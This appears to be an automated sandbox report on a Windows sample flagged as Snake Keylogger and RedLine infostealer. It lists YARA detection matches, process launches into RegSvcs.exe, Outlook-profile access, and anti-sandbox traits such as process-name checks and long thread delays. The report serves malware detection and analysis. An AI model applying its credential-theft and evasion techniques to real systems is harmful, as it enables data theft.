              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034CE7A GetLastError,FormatMessageW,0_2_0034CE7A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033AB84 AdjustTokenPrivileges,CloseHandle,0_2_0033AB84
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0033B134
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0034E1FD
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00346532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00346532
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0035C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0035C18C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0030406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0030406B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeFile created: C:\Users\user\AppData\Local\Temp\autBBB4.tmpJump to behavior
              Source: mnXS9meqtB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003236000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003213000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.000000000412E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003242000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.0000000003222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: mnXS9meqtB.exeVirustotal: Detection: 56%
              Source: mnXS9meqtB.exeReversingLabs: Detection: 79%
              Source: unknownProcess created: C:\Users\user\Desktop\mnXS9meqtB.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mnXS9meqtB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: mnXS9meqtB.exeStatic file information: File size 1132544 > 1048576
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: mnXS9meqtB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: mnXS9meqtB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: mnXS9meqtB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: mnXS9meqtB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: mnXS9meqtB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: mnXS9meqtB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031E01E LoadLibraryA,GetProcAddress,0_2_0031E01E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031288B push 66003123h; retn 0037h0_2_003128E1
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00326B05 push ecx; ret 0_2_00326B18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_03060D83 push ebx; retf 2_2_03060D92
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00368111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00368111
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0031EB42
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0032123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0032123A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeAPI/Special instruction interceptor: Address: D47AD4
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: mnXS9meqtB.exe, 00000000.00000003.2326466268.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000002.2346784176.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2327314610.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598795Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598572Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598460Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596264Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595978Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595567Jump to behavior
